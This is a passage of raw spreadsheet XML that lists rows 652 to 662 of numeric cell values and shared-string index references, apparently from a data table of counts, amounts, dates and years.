      <c r="O652">
        <v>0</v>
      </c>
      <c r="P652">
        <v>0</v>
      </c>
      <c r="Q652">
        <v>5</v>
      </c>
      <c r="R652">
        <v>0</v>
      </c>
      <c r="S652">
        <v>0</v>
      </c>
      <c r="T652">
        <v>1</v>
      </c>
      <c r="U652">
        <v>300000</v>
      </c>
      <c r="V652">
        <v>0</v>
      </c>
      <c r="W652">
        <v>2340</v>
      </c>
      <c r="X652">
        <v>2496</v>
      </c>
      <c r="Y652">
        <v>0</v>
      </c>
      <c r="Z652">
        <v>0</v>
      </c>
      <c r="AA652">
        <v>0</v>
      </c>
      <c r="AB652">
        <v>11100</v>
      </c>
      <c r="AC652">
        <v>0</v>
      </c>
      <c r="AD652">
        <v>0</v>
      </c>
      <c r="AE652">
        <v>1600</v>
      </c>
      <c r="AF652" t="s">
        <v>5146</v>
      </c>
      <c r="AG652">
        <v>50185</v>
      </c>
      <c r="AH652">
        <v>14</v>
      </c>
      <c r="AJ652">
        <v>220</v>
      </c>
      <c r="AK652" t="s">
        <v>3842</v>
      </c>
      <c r="AL652" t="s">
        <v>5147</v>
      </c>
      <c r="AM652" t="s">
        <v>5148</v>
      </c>
      <c r="AN652" t="s">
        <v>82</v>
      </c>
      <c r="AO652">
        <v>1996</v>
      </c>
      <c r="AP652" t="s">
        <v>5149</v>
      </c>
      <c r="AQ652" t="s">
        <v>5150</v>
      </c>
      <c r="AR652" t="s">
        <v>4422</v>
      </c>
      <c r="AS652" t="s">
        <v>71</v>
      </c>
      <c r="AT652" t="s">
        <v>86</v>
      </c>
      <c r="AU652">
        <v>20</v>
      </c>
      <c r="AV652">
        <v>1</v>
      </c>
      <c r="AW652">
        <v>0</v>
      </c>
      <c r="AX652">
        <v>0</v>
      </c>
      <c r="AY652">
        <v>262</v>
      </c>
      <c r="AZ652">
        <v>133</v>
      </c>
      <c r="BA652" t="s">
        <v>16750</v>
      </c>
      <c r="BB652" t="s">
        <v>15170</v>
      </c>
      <c r="BC652" t="s">
        <v>10710</v>
      </c>
      <c r="BD652" t="s">
        <v>10711</v>
      </c>
    </row>
    <row r="653" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A653">
        <v>2293</v>
      </c>
      <c r="B653" t="s">
        <v>5151</v>
      </c>
      <c r="C653" t="s">
        <v>318</v>
      </c>
      <c r="D653" t="s">
        <v>5152</v>
      </c>
      <c r="E653" t="s">
        <v>412</v>
      </c>
      <c r="F653" t="s">
        <v>4108</v>
      </c>
      <c r="G653" s="1">
        <v>43860</v>
      </c>
      <c r="H653">
        <v>1163</v>
      </c>
      <c r="I653">
        <v>1163</v>
      </c>
      <c r="J653">
        <v>1</v>
      </c>
      <c r="K653">
        <v>1</v>
      </c>
      <c r="L653">
        <v>1</v>
      </c>
      <c r="M653">
        <v>1</v>
      </c>
      <c r="N653">
        <v>0</v>
      </c>
      <c r="O653">
        <v>0</v>
      </c>
      <c r="P653">
        <v>0</v>
      </c>
      <c r="Q653">
        <v>2</v>
      </c>
      <c r="R653">
        <v>3</v>
      </c>
      <c r="S653">
        <v>0</v>
      </c>
      <c r="T653">
        <v>0</v>
      </c>
      <c r="U653">
        <v>12</v>
      </c>
      <c r="V653">
        <v>12</v>
      </c>
      <c r="W653">
        <v>3</v>
      </c>
      <c r="X653">
        <v>1000</v>
      </c>
      <c r="Y653">
        <v>0</v>
      </c>
      <c r="Z653">
        <v>0</v>
      </c>
      <c r="AA653">
        <v>0</v>
      </c>
      <c r="AB653">
        <v>750</v>
      </c>
      <c r="AC653">
        <v>750</v>
      </c>
      <c r="AD653">
        <v>0</v>
      </c>
      <c r="AE653">
        <v>0</v>
      </c>
      <c r="AF653" t="s">
        <v>5153</v>
      </c>
      <c r="AG653">
        <v>90000</v>
      </c>
      <c r="AH653">
        <v>26</v>
      </c>
      <c r="AJ653">
        <v>420</v>
      </c>
      <c r="AK653" t="s">
        <v>936</v>
      </c>
      <c r="AL653" t="s">
        <v>5112</v>
      </c>
      <c r="AM653" t="s">
        <v>5154</v>
      </c>
      <c r="AN653" t="s">
        <v>288</v>
      </c>
      <c r="AO653">
        <v>2009</v>
      </c>
      <c r="AP653" t="s">
        <v>5155</v>
      </c>
      <c r="AQ653" t="s">
        <v>5156</v>
      </c>
      <c r="AR653" t="s">
        <v>5153</v>
      </c>
      <c r="AS653" t="s">
        <v>71</v>
      </c>
      <c r="AT653" t="s">
        <v>86</v>
      </c>
      <c r="AU653">
        <v>0</v>
      </c>
      <c r="AV653">
        <v>0</v>
      </c>
      <c r="AW653">
        <v>0</v>
      </c>
      <c r="AX653">
        <v>0</v>
      </c>
      <c r="AY653">
        <v>21</v>
      </c>
      <c r="AZ653">
        <v>54</v>
      </c>
      <c r="BA653" t="s">
        <v>17118</v>
      </c>
      <c r="BB653" t="s">
        <v>15810</v>
      </c>
      <c r="BC653">
        <v>0</v>
      </c>
      <c r="BD653">
        <v>0</v>
      </c>
    </row>
    <row r="654" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A654">
        <v>2309</v>
      </c>
      <c r="B654" t="s">
        <v>5157</v>
      </c>
      <c r="C654" t="s">
        <v>60</v>
      </c>
      <c r="D654" t="s">
        <v>5158</v>
      </c>
      <c r="E654" t="s">
        <v>142</v>
      </c>
      <c r="F654" t="s">
        <v>5159</v>
      </c>
      <c r="G654" s="1">
        <v>43852</v>
      </c>
      <c r="H654">
        <v>1173</v>
      </c>
      <c r="I654">
        <v>1173</v>
      </c>
      <c r="J654">
        <v>2</v>
      </c>
      <c r="K654">
        <v>0</v>
      </c>
      <c r="L654">
        <v>1</v>
      </c>
      <c r="M654">
        <v>0</v>
      </c>
      <c r="N654">
        <v>0</v>
      </c>
      <c r="O654">
        <v>0</v>
      </c>
      <c r="P654">
        <v>0</v>
      </c>
      <c r="Q654">
        <v>0</v>
      </c>
      <c r="R654">
        <v>10</v>
      </c>
      <c r="S654">
        <v>0</v>
      </c>
      <c r="T654">
        <v>1</v>
      </c>
      <c r="U654">
        <v>20000</v>
      </c>
      <c r="V654">
        <v>20000</v>
      </c>
      <c r="W654">
        <v>3000</v>
      </c>
      <c r="X654">
        <v>0</v>
      </c>
      <c r="Y654">
        <v>0</v>
      </c>
      <c r="Z654">
        <v>0</v>
      </c>
      <c r="AA654">
        <v>0</v>
      </c>
      <c r="AB654">
        <v>0</v>
      </c>
      <c r="AC654">
        <v>500</v>
      </c>
      <c r="AD654">
        <v>0</v>
      </c>
      <c r="AE654">
        <v>5000</v>
      </c>
      <c r="AF654" t="s">
        <v>5160</v>
      </c>
      <c r="AG654">
        <v>35357</v>
      </c>
      <c r="AH654">
        <v>10</v>
      </c>
      <c r="AJ654">
        <v>128</v>
      </c>
      <c r="AK654" t="s">
        <v>5161</v>
      </c>
      <c r="AL654" t="s">
        <v>5161</v>
      </c>
      <c r="AM654" t="s">
        <v>5162</v>
      </c>
      <c r="AN654" t="s">
        <v>55</v>
      </c>
      <c r="AO654">
        <v>2019</v>
      </c>
      <c r="AP654" t="s">
        <v>5163</v>
      </c>
      <c r="AQ654" t="s">
        <v>5164</v>
      </c>
      <c r="AR654" t="s">
        <v>5165</v>
      </c>
      <c r="AS654" t="s">
        <v>71</v>
      </c>
      <c r="AT654" t="s">
        <v>86</v>
      </c>
      <c r="AU654">
        <v>25</v>
      </c>
      <c r="AV654">
        <v>1</v>
      </c>
      <c r="AW654">
        <v>11</v>
      </c>
      <c r="AX654">
        <v>66</v>
      </c>
      <c r="AY654">
        <v>5</v>
      </c>
      <c r="AZ654">
        <v>2</v>
      </c>
      <c r="BA654" t="s">
        <v>17127</v>
      </c>
      <c r="BB654" t="s">
        <v>15822</v>
      </c>
      <c r="BC654">
        <v>0</v>
      </c>
      <c r="BD654">
        <v>0</v>
      </c>
    </row>
    <row r="655" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A655">
        <v>2340</v>
      </c>
      <c r="B655" t="s">
        <v>5166</v>
      </c>
      <c r="C655" t="s">
        <v>458</v>
      </c>
      <c r="D655" t="s">
        <v>5167</v>
      </c>
      <c r="E655" t="s">
        <v>644</v>
      </c>
      <c r="F655" t="s">
        <v>5168</v>
      </c>
      <c r="G655" s="1">
        <v>43881</v>
      </c>
      <c r="H655">
        <v>1175</v>
      </c>
      <c r="I655">
        <v>1175</v>
      </c>
      <c r="J655">
        <v>0</v>
      </c>
      <c r="K655">
        <v>7</v>
      </c>
      <c r="L655">
        <v>0</v>
      </c>
      <c r="M655">
        <v>0</v>
      </c>
      <c r="N655">
        <v>0</v>
      </c>
      <c r="O655">
        <v>0</v>
      </c>
      <c r="P655">
        <v>0</v>
      </c>
      <c r="Q655">
        <v>0</v>
      </c>
      <c r="R655">
        <v>0</v>
      </c>
      <c r="S655">
        <v>0</v>
      </c>
      <c r="T655">
        <v>0</v>
      </c>
      <c r="U655">
        <v>0</v>
      </c>
      <c r="V655">
        <v>9000</v>
      </c>
      <c r="W655">
        <v>0</v>
      </c>
      <c r="X655">
        <v>0</v>
      </c>
      <c r="Y655">
        <v>0</v>
      </c>
      <c r="Z655">
        <v>0</v>
      </c>
      <c r="AA655">
        <v>0</v>
      </c>
      <c r="AB655">
        <v>0</v>
      </c>
      <c r="AC655">
        <v>0</v>
      </c>
      <c r="AD655">
        <v>0</v>
      </c>
      <c r="AE655">
        <v>0</v>
      </c>
      <c r="AF655" t="s">
        <v>5169</v>
      </c>
      <c r="AG655">
        <v>29663</v>
      </c>
      <c r="AH655">
        <v>5</v>
      </c>
      <c r="AJ655">
        <v>148</v>
      </c>
      <c r="AK655" t="s">
        <v>5170</v>
      </c>
      <c r="AL655" t="s">
        <v>5171</v>
      </c>
      <c r="AM655" t="s">
        <v>5172</v>
      </c>
      <c r="AN655" t="s">
        <v>55</v>
      </c>
      <c r="AO655">
        <v>2003</v>
      </c>
      <c r="AP655">
        <v>8121064441</v>
      </c>
      <c r="AQ655" t="s">
        <v>5173</v>
      </c>
      <c r="AR655" t="s">
        <v>5174</v>
      </c>
      <c r="AS655" t="s">
        <v>5175</v>
      </c>
      <c r="AT655" t="s">
        <v>58</v>
      </c>
      <c r="AU655">
        <v>0</v>
      </c>
      <c r="AV655">
        <v>0</v>
      </c>
      <c r="AW655">
        <v>0</v>
      </c>
      <c r="AX655">
        <v>0</v>
      </c>
      <c r="AY655">
        <v>58</v>
      </c>
      <c r="AZ655">
        <v>4</v>
      </c>
      <c r="BA655" t="s">
        <v>17138</v>
      </c>
      <c r="BB655" t="s">
        <v>15841</v>
      </c>
      <c r="BC655" t="s">
        <v>9899</v>
      </c>
      <c r="BD655" t="s">
        <v>10320</v>
      </c>
    </row>
    <row r="656" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A656">
        <v>2590</v>
      </c>
      <c r="B656" t="s">
        <v>4375</v>
      </c>
      <c r="C656" t="s">
        <v>99</v>
      </c>
      <c r="D656" t="s">
        <v>5176</v>
      </c>
      <c r="E656" t="s">
        <v>4304</v>
      </c>
      <c r="F656" t="s">
        <v>5177</v>
      </c>
      <c r="G656" s="1">
        <v>43865</v>
      </c>
      <c r="H656">
        <v>1189</v>
      </c>
      <c r="I656">
        <v>1189</v>
      </c>
      <c r="J656">
        <v>3</v>
      </c>
      <c r="K656">
        <v>0</v>
      </c>
      <c r="L656">
        <v>1</v>
      </c>
      <c r="M656">
        <v>5</v>
      </c>
      <c r="N656">
        <v>0</v>
      </c>
      <c r="O656">
        <v>0</v>
      </c>
      <c r="P656">
        <v>0</v>
      </c>
      <c r="Q656">
        <v>50</v>
      </c>
      <c r="R656">
        <v>50</v>
      </c>
      <c r="S656">
        <v>0</v>
      </c>
      <c r="T656">
        <v>2</v>
      </c>
      <c r="U656">
        <v>200000</v>
      </c>
      <c r="V656">
        <v>0</v>
      </c>
      <c r="W656">
        <v>500</v>
      </c>
      <c r="X656">
        <v>1000</v>
      </c>
      <c r="Y656">
        <v>0</v>
      </c>
      <c r="Z656">
        <v>0</v>
      </c>
      <c r="AA656">
        <v>0</v>
      </c>
      <c r="AB656">
        <v>500</v>
      </c>
      <c r="AC656">
        <v>500</v>
      </c>
      <c r="AD656">
        <v>0</v>
      </c>
      <c r="AE656">
        <v>20000</v>
      </c>
      <c r="AF656" t="s">
        <v>4378</v>
      </c>
      <c r="AG656">
        <v>14440</v>
      </c>
      <c r="AH656">
        <v>12</v>
      </c>
      <c r="AJ656">
        <v>160</v>
      </c>
      <c r="AK656" t="s">
        <v>114</v>
      </c>
      <c r="AL656" t="s">
        <v>114</v>
      </c>
      <c r="AM656" t="s">
        <v>5178</v>
      </c>
      <c r="AN656" t="s">
        <v>55</v>
      </c>
      <c r="AO656">
        <v>1995</v>
      </c>
      <c r="AP656" t="s">
        <v>5179</v>
      </c>
      <c r="AQ656" t="s">
        <v>5180</v>
      </c>
      <c r="AR656" t="s">
        <v>5181</v>
      </c>
      <c r="AU656">
        <v>25</v>
      </c>
      <c r="AV656">
        <v>2</v>
      </c>
      <c r="AW656">
        <v>36</v>
      </c>
      <c r="AX656">
        <v>96</v>
      </c>
      <c r="AY656">
        <v>15</v>
      </c>
      <c r="AZ656">
        <v>6</v>
      </c>
      <c r="BA656" t="s">
        <v>16935</v>
      </c>
      <c r="BB656" t="s">
        <v>15879</v>
      </c>
      <c r="BC656" t="s">
        <v>10107</v>
      </c>
      <c r="BD656" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="657" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A657">
        <v>2282</v>
      </c>
      <c r="B657" t="s">
        <v>5182</v>
      </c>
      <c r="C657" t="s">
        <v>47</v>
      </c>
      <c r="D657" t="s">
        <v>5183</v>
      </c>
      <c r="E657" t="s">
        <v>4304</v>
      </c>
      <c r="F657" t="s">
        <v>5184</v>
      </c>
      <c r="G657" s="1">
        <v>43861</v>
      </c>
      <c r="H657">
        <v>1201</v>
      </c>
      <c r="I657">
        <v>1201</v>
      </c>
      <c r="J657">
        <v>4</v>
      </c>
      <c r="K657">
        <v>1</v>
      </c>
      <c r="L657">
        <v>0</v>
      </c>
      <c r="M657">
        <v>1</v>
      </c>
      <c r="N657">
        <v>1000</v>
      </c>
      <c r="O657">
        <v>0</v>
      </c>
      <c r="P657">
        <v>0</v>
      </c>
      <c r="Q657">
        <v>1</v>
      </c>
      <c r="R657">
        <v>1</v>
      </c>
      <c r="S657">
        <v>0</v>
      </c>
      <c r="T657">
        <v>1</v>
      </c>
      <c r="U657">
        <v>3000000</v>
      </c>
      <c r="V657">
        <v>40000</v>
      </c>
      <c r="W657">
        <v>0</v>
      </c>
      <c r="X657">
        <v>750</v>
      </c>
      <c r="Y657">
        <v>0</v>
      </c>
      <c r="Z657">
        <v>0</v>
      </c>
      <c r="AA657">
        <v>0</v>
      </c>
      <c r="AB657">
        <v>1500</v>
      </c>
      <c r="AC657">
        <v>1500</v>
      </c>
      <c r="AD657">
        <v>0</v>
      </c>
      <c r="AE657">
        <v>100000</v>
      </c>
      <c r="AF657" t="s">
        <v>5185</v>
      </c>
      <c r="AG657">
        <v>20242</v>
      </c>
      <c r="AH657">
        <v>2</v>
      </c>
      <c r="AJ657">
        <v>53</v>
      </c>
      <c r="AK657" t="s">
        <v>1582</v>
      </c>
      <c r="AL657" t="s">
        <v>1583</v>
      </c>
      <c r="AM657" t="s">
        <v>5186</v>
      </c>
      <c r="AN657" t="s">
        <v>55</v>
      </c>
      <c r="AO657">
        <v>2014</v>
      </c>
      <c r="AP657" t="s">
        <v>5187</v>
      </c>
      <c r="AQ657" t="s">
        <v>5188</v>
      </c>
      <c r="AR657" t="s">
        <v>5189</v>
      </c>
      <c r="AS657" t="s">
        <v>71</v>
      </c>
      <c r="AT657" t="s">
        <v>58</v>
      </c>
      <c r="AU657">
        <v>20</v>
      </c>
      <c r="AV657">
        <v>1</v>
      </c>
      <c r="AW657">
        <v>66</v>
      </c>
      <c r="AX657">
        <v>100</v>
      </c>
      <c r="AY657">
        <v>10</v>
      </c>
      <c r="AZ657">
        <v>6</v>
      </c>
      <c r="BA657" t="s">
        <v>17115</v>
      </c>
      <c r="BB657" t="s">
        <v>15804</v>
      </c>
      <c r="BC657" t="s">
        <v>10094</v>
      </c>
      <c r="BD657" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="658" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A658">
        <v>2058</v>
      </c>
      <c r="B658" t="s">
        <v>5190</v>
      </c>
      <c r="C658" t="s">
        <v>157</v>
      </c>
      <c r="D658" t="s">
        <v>5191</v>
      </c>
      <c r="E658" t="s">
        <v>142</v>
      </c>
      <c r="F658" t="s">
        <v>5192</v>
      </c>
      <c r="G658" s="1">
        <v>43875</v>
      </c>
      <c r="H658">
        <v>1211</v>
      </c>
      <c r="I658">
        <v>1211</v>
      </c>
      <c r="J658">
        <v>3</v>
      </c>
      <c r="K658">
        <v>0</v>
      </c>
      <c r="L658">
        <v>4</v>
      </c>
      <c r="M658">
        <v>25</v>
      </c>
      <c r="N658">
        <v>0</v>
      </c>
      <c r="O658">
        <v>0</v>
      </c>
      <c r="P658">
        <v>0</v>
      </c>
      <c r="Q658">
        <v>20</v>
      </c>
      <c r="R658">
        <v>8</v>
      </c>
      <c r="S658">
        <v>0</v>
      </c>
      <c r="T658">
        <v>1</v>
      </c>
      <c r="U658">
        <v>1500000</v>
      </c>
      <c r="V658">
        <v>0</v>
      </c>
      <c r="W658">
        <v>16000</v>
      </c>
      <c r="X658">
        <v>12500</v>
      </c>
      <c r="Y658">
        <v>0</v>
      </c>
      <c r="Z658">
        <v>0</v>
      </c>
      <c r="AA658">
        <v>0</v>
      </c>
      <c r="AB658">
        <v>50</v>
      </c>
      <c r="AC658">
        <v>50</v>
      </c>
      <c r="AD658">
        <v>0</v>
      </c>
      <c r="AE658">
        <v>1500000</v>
      </c>
      <c r="AF658" t="s">
        <v>5193</v>
      </c>
      <c r="AG658">
        <v>60293</v>
      </c>
      <c r="AH658">
        <v>16</v>
      </c>
      <c r="AJ658">
        <v>264</v>
      </c>
      <c r="AK658" t="s">
        <v>1608</v>
      </c>
      <c r="AL658" t="s">
        <v>2230</v>
      </c>
      <c r="AM658" t="s">
        <v>5194</v>
      </c>
      <c r="AN658" t="s">
        <v>55</v>
      </c>
      <c r="AO658">
        <v>2017</v>
      </c>
      <c r="AP658">
        <v>318491772</v>
      </c>
      <c r="AQ658" t="s">
        <v>5195</v>
      </c>
      <c r="AR658" t="s">
        <v>5196</v>
      </c>
      <c r="AS658" t="s">
        <v>71</v>
      </c>
      <c r="AT658" t="s">
        <v>58</v>
      </c>
      <c r="AU658">
        <v>26</v>
      </c>
      <c r="AV658">
        <v>1</v>
      </c>
      <c r="AW658">
        <v>5</v>
      </c>
      <c r="AX658">
        <v>10</v>
      </c>
      <c r="AY658">
        <v>6</v>
      </c>
      <c r="AZ658">
        <v>12</v>
      </c>
      <c r="BA658" t="s">
        <v>17051</v>
      </c>
      <c r="BB658" t="s">
        <v>15673</v>
      </c>
      <c r="BC658" t="s">
        <v>9485</v>
      </c>
      <c r="BD658" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="659" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A659">
        <v>2545</v>
      </c>
      <c r="B659" t="s">
        <v>5197</v>
      </c>
      <c r="C659" t="s">
        <v>157</v>
      </c>
      <c r="D659" t="s">
        <v>5198</v>
      </c>
      <c r="E659" t="s">
        <v>131</v>
      </c>
      <c r="F659" t="s">
        <v>5199</v>
      </c>
      <c r="G659" s="1">
        <v>44075</v>
      </c>
      <c r="H659">
        <v>1228</v>
      </c>
      <c r="I659">
        <v>1228</v>
      </c>
      <c r="J659">
        <v>0</v>
      </c>
      <c r="K659">
        <v>0</v>
      </c>
      <c r="L659">
        <v>0</v>
      </c>
      <c r="M659">
        <v>0</v>
      </c>
      <c r="N659">
        <v>0</v>
      </c>
      <c r="O659">
        <v>0</v>
      </c>
      <c r="P659">
        <v>0</v>
      </c>
      <c r="Q659">
        <v>4</v>
      </c>
      <c r="R659">
        <v>12</v>
      </c>
      <c r="S659">
        <v>0</v>
      </c>
      <c r="T659">
        <v>7</v>
      </c>
      <c r="U659">
        <v>0</v>
      </c>
      <c r="V659">
        <v>0</v>
      </c>
      <c r="W659">
        <v>0</v>
      </c>
      <c r="X659">
        <v>0</v>
      </c>
      <c r="Y659">
        <v>0</v>
      </c>
      <c r="Z659">
        <v>0</v>
      </c>
      <c r="AA659">
        <v>0</v>
      </c>
      <c r="AB659">
        <v>32000</v>
      </c>
      <c r="AC659">
        <v>144000</v>
      </c>
      <c r="AD659">
        <v>1</v>
      </c>
      <c r="AE659">
        <v>3000000</v>
      </c>
      <c r="AF659" t="s">
        <v>5200</v>
      </c>
      <c r="AG659">
        <v>67155</v>
      </c>
      <c r="AH659">
        <v>16</v>
      </c>
      <c r="AJ659">
        <v>241</v>
      </c>
      <c r="AK659" t="s">
        <v>1231</v>
      </c>
      <c r="AL659" t="s">
        <v>5201</v>
      </c>
      <c r="AM659" t="s">
        <v>5202</v>
      </c>
      <c r="AN659" t="s">
        <v>82</v>
      </c>
      <c r="AO659">
        <v>1992</v>
      </c>
      <c r="AP659" t="s">
        <v>5203</v>
      </c>
      <c r="AQ659" t="s">
        <v>5204</v>
      </c>
      <c r="AR659" t="s">
        <v>5200</v>
      </c>
      <c r="AS659" t="s">
        <v>71</v>
      </c>
      <c r="AT659" t="s">
        <v>86</v>
      </c>
      <c r="AU659">
        <v>30</v>
      </c>
      <c r="AV659">
        <v>3</v>
      </c>
      <c r="AW659">
        <v>0</v>
      </c>
      <c r="AX659">
        <v>0</v>
      </c>
      <c r="AY659">
        <v>150</v>
      </c>
      <c r="AZ659">
        <v>10</v>
      </c>
      <c r="BA659" t="s">
        <v>17169</v>
      </c>
      <c r="BB659" t="s">
        <v>15853</v>
      </c>
      <c r="BC659" t="s">
        <v>9571</v>
      </c>
      <c r="BD659" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="660" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A660">
        <v>2331</v>
      </c>
      <c r="B660" t="s">
        <v>5205</v>
      </c>
      <c r="C660" t="s">
        <v>318</v>
      </c>
      <c r="D660" t="s">
        <v>5206</v>
      </c>
      <c r="E660" t="s">
        <v>111</v>
      </c>
      <c r="F660" t="s">
        <v>5207</v>
      </c>
      <c r="G660" s="1">
        <v>43909</v>
      </c>
      <c r="H660">
        <v>1231</v>
      </c>
      <c r="I660">
        <v>1231</v>
      </c>
      <c r="J660">
        <v>1</v>
      </c>
      <c r="K660">
        <v>1</v>
      </c>
      <c r="L660">
        <v>5</v>
      </c>
      <c r="M660">
        <v>1</v>
      </c>
      <c r="N660">
        <v>0</v>
      </c>
      <c r="O660">
        <v>0</v>
      </c>
      <c r="P660">
        <v>0</v>
      </c>
      <c r="Q660">
        <v>10</v>
      </c>
      <c r="R660">
        <v>25</v>
      </c>
      <c r="S660">
        <v>0</v>
      </c>
      <c r="T660">
        <v>0</v>
      </c>
      <c r="U660">
        <v>350</v>
      </c>
      <c r="V660">
        <v>250</v>
      </c>
      <c r="W660">
        <v>3000</v>
      </c>
      <c r="X660">
        <v>1000</v>
      </c>
      <c r="Y660">
        <v>0</v>
      </c>
      <c r="Z660">
        <v>0</v>
      </c>
      <c r="AA660">
        <v>0</v>
      </c>
      <c r="AB660">
        <v>250</v>
      </c>
      <c r="AC660">
        <v>250</v>
      </c>
      <c r="AD660">
        <v>0</v>
      </c>
      <c r="AE660">
        <v>0</v>
      </c>
      <c r="AF660" t="s">
        <v>5208</v>
      </c>
      <c r="AG660">
        <v>0</v>
      </c>
      <c r="AH660">
        <v>26</v>
      </c>
      <c r="AJ660">
        <v>420</v>
      </c>
      <c r="AK660" t="s">
        <v>936</v>
      </c>
      <c r="AL660" t="s">
        <v>1710</v>
      </c>
      <c r="AM660" t="s">
        <v>5209</v>
      </c>
      <c r="AN660" t="s">
        <v>68</v>
      </c>
      <c r="AO660">
        <v>2017</v>
      </c>
      <c r="AP660" t="s">
        <v>5210</v>
      </c>
      <c r="AQ660" t="s">
        <v>5211</v>
      </c>
      <c r="AR660" t="s">
        <v>5212</v>
      </c>
      <c r="AS660" t="s">
        <v>71</v>
      </c>
      <c r="AT660" t="s">
        <v>72</v>
      </c>
      <c r="AU660">
        <v>6</v>
      </c>
      <c r="AV660">
        <v>1</v>
      </c>
      <c r="AW660">
        <v>12</v>
      </c>
      <c r="AX660">
        <v>12</v>
      </c>
      <c r="AY660">
        <v>9</v>
      </c>
      <c r="AZ660">
        <v>8</v>
      </c>
      <c r="BA660" t="s">
        <v>17134</v>
      </c>
      <c r="BB660" t="s">
        <v>15109</v>
      </c>
      <c r="BC660" t="s">
        <v>10010</v>
      </c>
      <c r="BD660" t="s">
        <v>10102</v>
      </c>
    </row>
    <row r="661" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A661">
        <v>1999</v>
      </c>
      <c r="B661" t="s">
        <v>5213</v>
      </c>
      <c r="C661" t="s">
        <v>60</v>
      </c>
      <c r="D661" t="s">
        <v>5214</v>
      </c>
      <c r="E661" t="s">
        <v>242</v>
      </c>
      <c r="F661" t="s">
        <v>5215</v>
      </c>
      <c r="G661" s="1">
        <v>44228</v>
      </c>
      <c r="H661">
        <v>1240</v>
      </c>
      <c r="I661">
        <v>1240</v>
      </c>
      <c r="J661">
        <v>2</v>
      </c>
      <c r="K661">
        <v>0</v>
      </c>
      <c r="L661">
        <v>0</v>
      </c>
      <c r="M661">
        <v>2</v>
      </c>
      <c r="N661">
        <v>0</v>
      </c>
      <c r="O661">
        <v>0</v>
      </c>
      <c r="P661">
        <v>1</v>
      </c>
      <c r="Q661">
        <v>3</v>
      </c>
      <c r="R661">
        <v>0</v>
      </c>
      <c r="S661">
        <v>0</v>
      </c>
      <c r="T661">
        <v>1</v>
      </c>
      <c r="U661">
        <v>1200</v>
      </c>
      <c r="V661">
        <v>0</v>
      </c>
      <c r="W661">
        <v>0</v>
      </c>
      <c r="X661">
        <v>0</v>
      </c>
      <c r="Y661">
        <v>0</v>
      </c>
      <c r="Z661">
        <v>0</v>
      </c>
      <c r="AA661">
        <v>0</v>
      </c>
      <c r="AB661">
        <v>0</v>
      </c>
      <c r="AC661">
        <v>0</v>
      </c>
      <c r="AD661">
        <v>0</v>
      </c>
      <c r="AE661">
        <v>600</v>
      </c>
      <c r="AF661" t="s">
        <v>5216</v>
      </c>
      <c r="AG661">
        <v>35122</v>
      </c>
      <c r="AH661">
        <v>10</v>
      </c>
      <c r="AJ661">
        <v>128</v>
      </c>
      <c r="AK661" t="s">
        <v>65</v>
      </c>
      <c r="AL661" t="s">
        <v>5217</v>
      </c>
      <c r="AM661" t="s">
        <v>5218</v>
      </c>
      <c r="AN661" t="s">
        <v>55</v>
      </c>
      <c r="AO661">
        <v>2010</v>
      </c>
      <c r="AP661" t="s">
        <v>5219</v>
      </c>
      <c r="AQ661" t="s">
        <v>5220</v>
      </c>
      <c r="AR661" t="s">
        <v>5221</v>
      </c>
      <c r="AS661" t="s">
        <v>71</v>
      </c>
      <c r="AT661" t="s">
        <v>58</v>
      </c>
      <c r="AU661">
        <v>25</v>
      </c>
      <c r="AV661">
        <v>2</v>
      </c>
      <c r="AW661">
        <v>56</v>
      </c>
      <c r="AX661">
        <v>224</v>
      </c>
      <c r="AY661">
        <v>50</v>
      </c>
      <c r="AZ661">
        <v>150</v>
      </c>
      <c r="BA661" t="s">
        <v>16653</v>
      </c>
      <c r="BB661" t="s">
        <v>15635</v>
      </c>
      <c r="BC661">
        <v>0</v>
      </c>
      <c r="BD661" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="662" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A662">
        <v>1846</v>
      </c>
      <c r="B662" t="s">
        <v>5222</v>
      </c>
      <c r="C662" t="s">
        <v>157</v>
      </c>
      <c r="D662" t="s">
        <v>5223</v>
      </c>
      <c r="E662" t="s">
        <v>142</v>
      </c>
      <c r="F662" t="s">
        <v>5224</v>
      </c>
      <c r="G662" s="1">
        <v>43865</v>
      </c>
      <c r="H662">
        <v>1282</v>
      </c>
      <c r="I662">
        <v>1282</v>
      </c>
      <c r="J662">
        <v>4</v>
      </c>
      <c r="K662">
        <v>4</v>
      </c>
      <c r="L662">
        <v>2</v>
      </c>
      <c r="M662">
        <v>0</v>
      </c>
      <c r="N662">
        <v>0</v>
      </c>
      <c r="O662">
        <v>0</v>
      </c>
      <c r="P662">
        <v>0</v>
      </c>
      <c r="Q662">
        <v>5</v>
      </c>
      <c r="R662">
        <v>9</v>
      </c>
      <c r="S662">
        <v>1</v>
      </c>
      <c r="T662">
        <v>1</v>
      </c>
      <c r="U662">
        <v>100</v>
      </c>
      <c r="V662">
        <v>100</v>
      </c>
      <c r="W662">
        <v>5</v>
      </c>
      <c r="X662">
        <v>0</v>
      </c>
      <c r="Y662">
        <v>0</v>
      </c>
      <c r="Z662">
        <v>0</v>
      </c>
      <c r="AA662">
        <v>0</v>
      </c>
      <c r="AB662">
        <v>50</v>
      </c>
      <c r="AC662">
        <v>450</v>
      </c>
      <c r="AD662">
        <v>1</v>
      </c>
      <c r="AE662">
        <v>10</v>
      </c>
      <c r="AF662" t="s">
        <v>5225</v>
      </c>
      <c r="AG662">
        <v>61254</v>
      </c>
      <c r="AH662">
        <v>16</v>
      </c>
      <c r="AJ662">
        <v>242</v>
      </c>
      <c r="AK662" t="s">
        <v>490</v>
      </c>
      <c r="AL662" t="s">
        <v>5226</v>
      </c>
      <c r="AM662" t="s">
        <v>5227</v>
      </c>
      <c r="AN662" t="s">
        <v>55</v>
      </c>
      <c r="AO662">
        <v>2005</v>
      </c>
      <c r="AP662" t="s">
        <v>5228</v>
      </c>
      <c r="AQ662" t="s">
        <v>5229</v>
      </c>
